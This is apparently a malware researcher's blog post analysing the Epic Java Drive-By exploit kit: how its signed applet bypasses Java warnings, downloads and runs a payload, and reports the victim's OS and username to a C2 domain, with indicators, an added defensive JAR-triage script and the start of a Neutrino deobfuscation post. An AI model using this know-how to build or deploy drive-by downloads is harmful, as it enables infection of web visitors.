<i><span style="font-size: x-small;">part of Epic Java advertisement from Hackforums</span></i></div>
<br />
In the '<span style="color: #3d85c6;">Terms & Conditions</span>' section it is referred to as an '<span style="color: #3d85c6;">Educational Java Drive-By</span>'. I'm not quite sure whether that is a type of account under their service or whether they sell the product under an '<span style="color: #3d85c6;">educational purpose only</span>' banner.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRCGpXm40aQf_Cn-mXZ1ZC7xcp8cd9yQpNKlaFph8JcLfh90zGmE9wMrSDA_pTjF5wnFO2Z3MwpoMG8P6Cg0y1v1T-jlKHO8mjkKk-YnrOKFWXzd1fJwCoexc8HXBmrjOS4oRW4zFEnpbk/s1600/2014-01-14-EpicJDB-terms.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRCGpXm40aQf_Cn-mXZ1ZC7xcp8cd9yQpNKlaFph8JcLfh90zGmE9wMrSDA_pTjF5wnFO2Z3MwpoMG8P6Cg0y1v1T-jlKHO8mjkKk-YnrOKFWXzd1fJwCoexc8HXBmrjOS4oRW4zFEnpbk/s1600/2014-01-14-EpicJDB-terms.png" height="132" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">part of '<span style="color: #3d85c6;">Term & Conditions</span>' for Epic Java</span></i></div>
<br />
The advertised features are a bit of an overkill for something sold as '<span style="color: #3d85c6;">educational purpose only</span>', though.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8Gk32o-kehtFqsUtp3Wtjw0mPab0y4LZ37YIEBHqejY3o9Fp77xTj3SvMYeJjlkOtDzhdNIrqQRZGaAAps8HZIdGVSHH8o3B3fkA5f4u_NlR8bSm9o8QZYvu-Opb7jlSIAKJsCQaNlruQ/s1600/2014-01-14-EpicJDB-features.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8Gk32o-kehtFqsUtp3Wtjw0mPab0y4LZ37YIEBHqejY3o9Fp77xTj3SvMYeJjlkOtDzhdNIrqQRZGaAAps8HZIdGVSHH8o3B3fkA5f4u_NlR8bSm9o8QZYvu-Opb7jlSIAKJsCQaNlruQ/s1600/2014-01-14-EpicJDB-features.png" height="253" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Epic Java features as per advert on Hackforums</span></i></div>
<br />
<b><span style="color: #3d85c6;">"I'm not confident on which end that came out of."</span></b><br />
<br />
In terms of implementation, this kit doesn't contain any exploit code. It uses a certificate-signed JAR file to get past the Java security warning dialog (this works only on Java 7 Update 21 and earlier) and to run the applet outside the sandbox with the user's full privileges: once a signed applet is trusted, the applet sandbox no longer restricts it, so no vulnerability is needed. The Java code is obfuscated with Zelix KlassMaster using name obfuscation, control flow obfuscation and string encryption.<br />
<br />
A compromise attempt starts with the victim landing on a website that serves pages injected with the malicious Epic JDB applet tag.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimofqB9m50ZrbQiIXNmgeBP6OfJEAHZavvq_QSPnzMnQ1X_X5t0l9DudC0IGsTPmdVJbKpWhPxRIhAtU87B_zcVywK4m6cruoyczFIFceliN1bYRhiea6CaJJfv6YBewpik6wSI432uACh/s1600/2014-01-14-EpicJDB-applet.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimofqB9m50ZrbQiIXNmgeBP6OfJEAHZavvq_QSPnzMnQ1X_X5t0l9DudC0IGsTPmdVJbKpWhPxRIhAtU87B_zcVywK4m6cruoyczFIFceliN1bYRhiea6CaJJfv6YBewpik6wSI432uACh/s1600/2014-01-14-EpicJDB-applet.png" height="36" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">sample of the injected applet tag</span></i></div>
<br />
The following URL pattern was observed with this Epic JDB sample.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrtBpncVwsIbVNtMif8Ha_5oqUIrjWwc0Tq0h13NwHh-2sT41BD8xuElgY9bLleQdrGhosDqSzwN_OQtyyE_WGc0P7PuBoOyQrFanlWQnVzh1Sv6PN_vg7XINEtwsG8ikbFLac9VgrL3J-/s1600/2014-01-14-EpicJDB-URL-pattern.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrtBpncVwsIbVNtMif8Ha_5oqUIrjWwc0Tq0h13NwHh-2sT41BD8xuElgY9bLleQdrGhosDqSzwN_OQtyyE_WGc0P7PuBoOyQrFanlWQnVzh1Sv6PN_vg7XINEtwsG8ikbFLac9VgrL3J-/s1600/2014-01-14-EpicJDB-URL-pattern.png" height="51" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">sample of Epic JDB URL pattern</span></i></div>
<br />
The JAR file is signed with the following certificate.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilzHdaRVnuZyH6ROrhw-GGavx54noKQG3VEfXdSLgBv-kqpjLtkO3K2CW9MYV1bfwdeYyEPA3RgmMuVGrdCUrwqJ1P_MpJiZ97tQvjMDx8NxmC-06obhktZwHU4c22QsyiIBwZebTngDYD/s1600/2014-01-14-EpicJDB-URL-certificate.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilzHdaRVnuZyH6ROrhw-GGavx54noKQG3VEfXdSLgBv-kqpjLtkO3K2CW9MYV1bfwdeYyEPA3RgmMuVGrdCUrwqJ1P_MpJiZ97tQvjMDx8NxmC-06obhktZwHU4c22QsyiIBwZebTngDYD/s1600/2014-01-14-EpicJDB-URL-certificate.png" height="155" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">certificate the JAR file is signed with</span></i></div>
<br />
The JAR file structure is simple: a single class file inside.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMUr-JNsbWRcvFji2PfGIz43JyhIPKvICytvwIQ5y0VgVOSblElNRmtuT3TInzUksbHtJOJHqCeLvE97ttln8F_q8hwDZQWXNMRktOpQA3vhPgTV_BEGNFp9-jODUb56khrsWYNM8hiBK2/s1600/2014-01-14-EpicJDB-JAR-structure.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMUr-JNsbWRcvFji2PfGIz43JyhIPKvICytvwIQ5y0VgVOSblElNRmtuT3TInzUksbHtJOJHqCeLvE97ttln8F_q8hwDZQWXNMRktOpQA3vhPgTV_BEGNFp9-jODUb56khrsWYNM8hiBK2/s1600/2014-01-14-EpicJDB-JAR-structure.png" height="134" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">JD-GUI - Epic JDB JAR file structure</span></i></div>
<br />
As can be seen in the screenshot above, ZKM does a good job of obfuscating the code; JD-GUI couldn't handle it. After some voodoo with <a href="https://github.com/Contra/JMD" rel="nofollow" target="_blank">JMD</a> to reverse some of the ZKM changes and the Procyon Java <a href="https://bitbucket.org/mstrobel/procyon/wiki/Java%20Decompiler" rel="nofollow" target="_blank">Decompiler</a> to restore Java code and produce a bytecode AST, I got some readable code. The applet execution starts by gathering some system data and pulling the values of some parameters from the landing page.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDf9K1TEH_4P3LxdlA3gKkcFWwUpKX_R9QtMqGqT2m-rwAd7KgdMrBWPxTn1FXSi5IcsZHJ1YJuuXJryvJ8WNBMNmM0TyqCCWniMU96Em4DvSKoFJsWtL1GC1Py8K-To2Og2GLGxzsaMq1/s1600/2014-01-14-EpicJDB-applet-code1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDf9K1TEH_4P3LxdlA3gKkcFWwUpKX_R9QtMqGqT2m-rwAd7KgdMrBWPxTn1FXSi5IcsZHJ1YJuuXJryvJ8WNBMNmM0TyqCCWniMU96Em4DvSKoFJsWtL1GC1Py8K-To2Og2GLGxzsaMq1/s1600/2014-01-14-EpicJDB-applet-code1.png" height="66" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Epic JDB - information gathering and retrieval</span></i></div>
<br />
After '<span style="color: #3d85c6;">massaging</span>' the gathered data a little, a GET request is made to pull down the Initial Payload from a predefined location stored in the applet's '<span style="color: #3d85c6;">ca</span>' parameter.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9MUxuwsBx4fpPJjtEynF4Kwy_B7I2ZKj_2j4w2fbvzJxycZDS3BC07rHG-XqwLjKT1mhPX6J6B-tXVqkZ832Gn6Fw3UaOi12luJYLdLEu2JF5pYZkiLdzvg9BZbKLtQidDMnrvuydepJv/s1600/2014-01-14-EpicJDB-applet-code2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9MUxuwsBx4fpPJjtEynF4Kwy_B7I2ZKj_2j4w2fbvzJxycZDS3BC07rHG-XqwLjKT1mhPX6J6B-tXVqkZ832Gn6Fw3UaOi12luJYLdLEu2JF5pYZkiLdzvg9BZbKLtQidDMnrvuydepJv/s1600/2014-01-14-EpicJDB-applet-code2.png" height="40" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Epic JDB - data manipulations and Initial Payload request</span></i></div>
<br />
After the Initial Payload is downloaded, the code determines the file type by looking for the substring '<span style="color: #3d85c6;">.ex</span>' in the applet's '<span style="color: #3d85c6;">us</span>' parameter.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaJNSmIcExoO245GzVeiMvT1s2_LyZLoY5BxMIh_AAlmk4mRDjJWdHvtaD3WbOoecVznk4KcYdUtadbz4PQsNC57eyWSewS41745Pt5p4tVWk6KublUXcA83I7KD50stgrZV5mkQAcH3as/s1600/2014-01-14-EpicJDB-applet-AST1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaJNSmIcExoO245GzVeiMvT1s2_LyZLoY5BxMIh_AAlmk4mRDjJWdHvtaD3WbOoecVznk4KcYdUtadbz4PQsNC57eyWSewS41745Pt5p4tVWk6KublUXcA83I7KD50stgrZV5mkQAcH3as/s1600/2014-01-14-EpicJDB-applet-AST1.png" height="35" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Epic JDB - Initial Payload type check (bytecode AST view)</span></i></div>
<br />
If an '<span style="color: #3d85c6;">exe</span>' filename is detected, the code goes straight to executing it, redirects the browser to the original compromised website (whose address is stored in the applet's '<span style="color: #3d85c6;">uk</span>' parameter) and reports to the C2.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaFBsb8WJl05Bh2sLoZvPSRKWqt8nXL0vJwxxCBs282EnHYoojBO3rGhvl-YMS-QlNlHje6we3EFKwzNyHUTIw7JRzu5jjlRTOG5KLx0fQt0sbjHLkQSqoE51GBc3wQeFx1Kk7gQhRpa0e/s1600/2014-01-14-EpicJDB-applet-code3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaFBsb8WJl05Bh2sLoZvPSRKWqt8nXL0vJwxxCBs282EnHYoojBO3rGhvl-YMS-QlNlHje6we3EFKwzNyHUTIw7JRzu5jjlRTOG5KLx0fQt0sbjHLkQSqoE51GBc3wQeFx1Kk7gQhRpa0e/s1600/2014-01-14-EpicJDB-applet-code3.png" height="39" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Epic JDB - Initial Payload execution, browser redirect and callback request</span></i></div>
<br />
C2 URL is hardcoded and pointing at '<span style="color: #3d85c6;">epickit.net</span>' website. The following parameters and data are being added to the URL before being sent:<br />
<ul>
<li>'<span style="color: #3d85c6;">username=</span>' holds a predefined value stored in the applet's '<span style="color: #3d85c6;">nl</span>' parameter; in this sample it is '<span style="color: #3d85c6;">fox33</span>'. Possibly it identifies the campaign owner.</li>
<li>'<span style="color: #3d85c6;">os=</span>' holds the type of the OS the applet is running on. It's gathered through '<span style="color: #3d85c6;">System.getProperty("os.name");</span>'</li>
<li>'<span style="color: #3d85c6;">pc=</span>' holds the username of the currently logged in user. It's gathered through '<span style="color: #3d85c6;">System.getProperty("user.name");</span>'</li>
</ul>
<div>
In addition, the word '<span style="color: #3d85c6;">Traditional</span>' is appended to the request. I'm not quite sure of its purpose, but my best guess is that it's a work-in-progress artefact. Intentionally or not, I was greeted with the following response to the C2 GET request:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyCcCEkIBm9NcTIhnfS91Irs1VKNhlbwR2cEOlI0NTIWr4AKywEdP2wx9cgihsaozaJ9MBSM9-e66mhyApCDjCyTsa4JHFkUmnCzHF_V_y3B7oXhJeU4ULc_x17q8D-thqkIzS1prPb0g-/s1600/2014-01-14-EpicJDB-callback-response.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyCcCEkIBm9NcTIhnfS91Irs1VKNhlbwR2cEOlI0NTIWr4AKywEdP2wx9cgihsaozaJ9MBSM9-e66mhyApCDjCyTsa4JHFkUmnCzHF_V_y3B7oXhJeU4ULc_x17q8D-thqkIzS1prPb0g-/s1600/2014-01-14-EpicJDB-callback-response.png" height="88" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Epic JDB - Callback response</span></i></div>
</div>
<div>
<br /></div>
<div>
The file execution part is slightly different if the Initial Payload is a '<span style="color: #3d85c6;">jar</span>' file. After confirming that the underlying platform is '<span style="color: #3d85c6;">windows</span>', the following code is executed:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4-ncDG_jOE3hh3oFske67pnBoobnf6SeqCxHkKl6elp5NBc-9tXpqfqtyW54P7NeJnfvB5f-1s75zRkp5N1f_51dX6oyH-hOcoOsZqYSFwmDfOb9BecxYy5J04cHcfpDiYa0JUTg1ypHd/s1600/2014-01-14-EpicJDB-applet-code4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4-ncDG_jOE3hh3oFske67pnBoobnf6SeqCxHkKl6elp5NBc-9tXpqfqtyW54P7NeJnfvB5f-1s75zRkp5N1f_51dX6oyH-hOcoOsZqYSFwmDfOb9BecxYy5J04cHcfpDiYa0JUTg1ypHd/s1600/2014-01-14-EpicJDB-applet-code4.png" height="29" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Epic JDB - JAR file execution routine</span></i></div>
<br />
There are some code artefacts that might indicate ongoing development, or could simply be the result of ZKM mangling the code.<br />
<br />
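The two facts that matter most when triaging a JAR like the one above (is it signed, and what does its single class reference) can be checked offline before any decompiler is involved. The script below is an added example, not code from the post or from the kit: it lists the signature files in META-INF, flags any non-class content that could hide a payload, walks each class file's constant pool for readable strings (fingerprinting and execution APIs such as '<span style="color: #3d85c6;">os.name</span>', '<span style="color: #3d85c6;">user.name</span>' and '<span style="color: #3d85c6;">java/lang/Runtime</span>') and counts non-printable entries, which is what ZKM string encryption leaves behind. The sample JAR is constructed inline: the signature block is a placeholder blob, not a real PKCS#7 signature, and the class file has a valid constant pool but is not JVM-loadable. Certificate details still come from <span style="color: #3d85c6;">jarsigner -verify -verbose -certs</span>, which this script does not replace.<br />

```python
"""Offline triage of a captured applet JAR: signed or not, what is inside,
and which readable constant-pool strings hint at its behaviour.

Added example. The sample JAR at the bottom is constructed for the demo.
"""
import io
import struct
import zipfile

# Strings whose presence in a class points at the behaviour seen in the post:
# system fingerprinting, download, execute, browser redirect.
API_MARKERS = ("os.name", "user.name", "java/lang/Runtime", "exec",
               "java/net/URL", "java/io/FileOutputStream", "showDocument")


def constant_pool_strings(class_bytes):
    """Walk the constant pool of a .class file and return its Utf8 entries."""
    if class_bytes[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a class file")
    count = struct.unpack_from(">H", class_bytes, 8)[0]   # constant_pool_count
    pos, idx, strings = 10, 1, []
    while idx < count:
        tag = class_bytes[pos]
        if tag == 1:                                     # CONSTANT_Utf8
            length = struct.unpack_from(">H", class_bytes, pos + 1)[0]
            strings.append(class_bytes[pos + 3:pos + 3 + length]
                           .decode("utf-8", "replace"))
            pos += 3 + length
        elif tag in (7, 8, 16, 19, 20):                  # Class, String, MethodType, Module, Package
            pos += 3
        elif tag in (3, 4, 9, 10, 11, 12, 17, 18):       # Int, Float, *ref, NameAndType, (Invoke)Dynamic
            pos += 5
        elif tag in (5, 6):                              # Long, Double occupy two slots
            pos += 9
            idx += 1
        elif tag == 15:                                  # MethodHandle
            pos += 4
        else:
            raise ValueError(f"unknown constant pool tag {tag}")
        idx += 1
    return strings


def opaque(strings):
    """Utf8 entries that are not printable ASCII: what ZKM string encryption leaves behind."""
    return [s for s in strings if not all(32 <= ord(c) < 127 for c in s)]


def triage_jar(jar_bytes):
    report = {"signature_files": [], "classes": {}, "other_files": [],
              "api_markers": set(), "opaque_strings": 0}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as z:
        for name in z.namelist():
            upper = name.upper()
            if upper.startswith("META-INF/") and upper.endswith((".SF", ".RSA", ".DSA", ".EC")):
                report["signature_files"].append(name)
            elif name.endswith(".class"):
                strings = constant_pool_strings(z.read(name))
                report["classes"][name] = strings
                report["opaque_strings"] += len(opaque(strings))
                report["api_markers"].update(
                    m for m in API_MARKERS if any(m in s for s in strings))
            elif not upper.startswith("META-INF/"):
                report["other_files"].append(name)       # hidden payloads would show up here
    # Only a signature block (.RSA/.DSA/.EC) makes the JAR signed; an .SF on its own does not.
    report["signed"] = any(n.upper().endswith((".RSA", ".DSA", ".EC"))
                           for n in report["signature_files"])
    return report


# --- constructed sample JAR (demo input, not a captured file) ---------------
def _utf8(s):
    data = s.encode("utf-8")
    return b"\x01" + struct.pack(">H", len(data)) + data


def build_class(strings):
    """Minimal class file whose constant pool holds only the given Utf8 entries."""
    pool = b"".join(_utf8(s) for s in strings)
    return (b"\xca\xfe\xba\xbe" + struct.pack(">HH", 0, 51)        # Java 7 class version
            + struct.pack(">H", len(strings) + 1) + pool
            + struct.pack(">HHHHHHH", 0x21, 1, 2, 0, 0, 0, 0))      # flags, this, super, no members


def build_jar(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, data in entries.items():
            z.writestr(name, data)
    return buf.getvalue()


SAMPLE_JAR = build_jar({
    "META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\r\n\r\n",
    "META-INF/SIGNER.SF": b"Signature-Version: 1.0\r\n",
    "META-INF/SIGNER.RSA": b"\x30\x82\x00\x00placeholder",          # not a real signature
    "Applet.class": build_class(["os.name", "user.name", "java/lang/Runtime",
                                 "exec", "\x07\x1f\x63\x02"]),      # last entry mimics an encrypted string
})

if __name__ == "__main__":
    r = triage_jar(SAMPLE_JAR)
    print("signed:", r["signed"], r["signature_files"])
    print("classes:", list(r["classes"]), "other files:", r["other_files"])
    print("api markers:", sorted(r["api_markers"]), "opaque strings:", r["opaque_strings"])
```

On a real sample, a high '<span style="color: #3d85c6;">opaque_strings</span>' count with no API markers is the tell that strings are encrypted and the decompiler route described above is needed; a signed JAR with a single class and a download-and-execute marker set is the whole kit in one line of output.<br />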
<b><span style="color: #3d85c6;">Summary</span></b><br />
<br />
<div class="CSSTableGenerator">
<table>
<tbody>
<tr>
<td style="background-color: #f79646; color: white;"><b>Summary Information</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Name:</td>
<td style="background-color: #b8cce4; color: black;">Epic Java Drive-By a.k.a EpicKit</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Date captured:</td>
<td style="background-color: #b8cce4; color: black;">2014-01-14</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Date analysed:</td>
<td style="background-color: #b8cce4; color: black;">2014-01-14</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Source/Credits:</td>
<td style="background-color: #b8cce4; color: black;">Intel source - <a href="https://twitter.com/MaartenVDantzig" rel="nofollow" target="_blank">@MaartenVDantzig</a> <a href="https://twitter.com/cryptoron" rel="nofollow" target="_blank">@cryptoron</a>.<br />
Data source - live traffic capture with Fiddler.</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Infection vectors detected:</td>
<td style="background-color: #b8cce4; color: black;">Java</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Vulnerabilities targeted:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Landing page</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Transfer mode:</td>
<td style="background-color: #b8cce4; color: black;">plain text</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Obfuscation:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">TDS:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JNLP:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JVM parameters:</td>
<td style="background-color: #b8cce4; color: black;">Yes - 4</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Java infection vector</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Analysed with:</td>
<td style="background-color: #b8cce4; color: black;">Java 1.7.07</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Obfuscation:</td>
<td style="background-color: #b8cce4; color: black;">Zelix KlassMaster - String encryption, Variable Names & Control Flow obfuscation</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JAR hidden content:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload delivery method:</td>
<td style="background-color: #b8cce4; color: black;">URL</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload encryption/encoding:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload store location:</td>
<td style="background-color: #b8cce4; color: black;">System's Temp folder</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload filename:</td>
<td style="background-color: #b8cce4; color: black;">javasan.exe</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Adobe infection vector</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Analysed with:</td>
<td style="background-color: #b8cce4; color: black;">NA</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload delivery method:</td>
<td style="background-color: #b8cce4; color: black;">NA</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload store location:</td>
<td style="background-color: #b8cce4; color: black;">NA</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload filename:</td>
<td style="background-color: #b8cce4; color: black;">NA</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Automated analysis</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Exploit components:</td>
<td style="background-color: #b8cce4; color: black;">JAR - <a href="https://www.virustotal.com/en/file/d3b1607ea770459707c89928707e7768d449bc856bf91c684849e97f4c3f55e2/analysis/" rel="nofollow" target="_blank">https://www.virustotal.com</a>
</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Delivered malware:</td>
<td style="background-color: #b8cce4; color: black;">EXE(MD5 f79eb2c78a11194cde18cc7190304ec5)<br />
<a href="https://malwr.com/analysis/YjE5MTMyMzQ3YTkyNDk3MGE3NjkxZWE0NTBlNjEyNzI/" rel="nofollow" target="_blank">https://malwr.com/</a> <br />
<a href="https://www.virustotal.com/en/file/3124fc4b6acf28cbebd8463cbf3e7279a73135e0c64b0133adc4c18188761f6e/analysis/" rel="nofollow" target="_blank">https://www.virustotal.com</a>
</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Additional Information</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;"><br /></td>
<td style="background-color: #b8cce4; color: black;">Uses certificate signed JAR to bypass Java security measures.<br />
Supports 2 Initial Payload file formats - EXE and JAR<br />
Shares some similarity with Zuponcic Kit</td>
</tr>
</tbody></table>
</div>
<br />
<br />
External References:<br />
<a href="http://blog.malwarebytes.org/fraud-scam/2014/01/musical-bitcoin-bubbles-serve-java-applets-malware/" rel="nofollow" target="_blank">http://blog.malwarebytes.org/fraud-scam/2014/01/musical-bitcoin-bubbles-serve-java-applets-malware/</a><br />
<br /><b><span style="color: #3d85c6;">Deobfuscation tips: Reversing Java bytecode 'poisoning'</span></b> (2014-01-12)<br />
<u>DISCLAIMER:</u> I'm pretty sure better and more efficient (automated) methods exist to achieve the same results as the exercise below. My intention was to do it manually, using freely available tools; time was not a concern. I'm not aware of a proper name for this obfuscation technique, so I called it '<span style="color: #3d85c6;">Java bytecode poisoning</span>'. This is not a step-by-step guide, just some tips.<br />
<br />
If you want to try this method following the steps described below, you'll need the following skills and tools:<br />
<br />
<b>Skills</b><br />
<ul>
<li>Good understanding of Java class file structure</li>
<li>Good understanding of Java bytecode instructions</li>
<li>Basic understanding of how a LIFO stack works</li>
</ul>
<b>Tools</b><br />
<ul>
<li><a href="http://dirty-joe.com/" rel="nofollow" target="_blank">dirtyJOE</a> - Java Overall Editor</li>
<li><a href="http://set.ee/jbe/" rel="nofollow" target="_blank">JBE</a> - Java Bytecode Editor</li>
<li><a href="http://jd.benow.ca/" rel="nofollow" target="_blank">JD-GUI</a> - Java Decompiler</li>
</ul>
<div>
<u style="font-style: italic;">Update 2014-01-19:</u> Discovered a tool that simplifies the task dramatically. Apart from a handy text-editor style interface for bytecode editing, it also adjusts exception and conditional jump addressing automatically. reJ - <a href="http://rejava.sourceforge.net/index.html" rel="nofollow" target="_blank">http://rejava.sourceforge.net/index.html</a></div>
<div>
<br /></div>
<b><span style="color: #3d85c6;">When cosmic rays hit atoms...</span></b><br />
<br />
<u>NOTE:</u> Neutrino EK sample was obtained from <a href="http://www.malware-traffic-analysis.net/2014/01/02/index.html" rel="nofollow" target="_blank">www.malware-traffic-analysis.net</a><br />
<br />
Not that long ago the Neutrino EK authors started using a bytecode obfuscation technique that renders some Java decompilers useless for restoring Neutrino's source code. Here is how decompiled Neutrino EK used to look before this '<span style="color: #3d85c6;">upgrade</span>'...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6SWLRvTnacAdy2_9HJbjB0GRmpZ0DsqjTVwkgQlFPbRoThRau6OqWcixPZn9u_W-qxl6hgZuBFBIc0xIYWBsB2DYVXHqa4I_ISrMfynmIoxw2g1-n6m3bVTXwt6ctLBk_Jm8TiN3taSc_/s1600/2013-09-Neutrino-code-sample.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6SWLRvTnacAdy2_9HJbjB0GRmpZ0DsqjTVwkgQlFPbRoThRau6OqWcixPZn9u_W-qxl6hgZuBFBIc0xIYWBsB2DYVXHqa4I_ISrMfynmIoxw2g1-n6m3bVTXwt6ctLBk_Jm8TiN3taSc_/s1600/2013-09-Neutrino-code-sample.png" height="161" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>Neutrino EK 2013-09 sample decompiled using JD-GUI</i></span></div>
<br />
Apart from some string obfuscation, the code is pretty readable. And here is how one of the recent samples looks when decompiled using the same JD-GUI tool...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
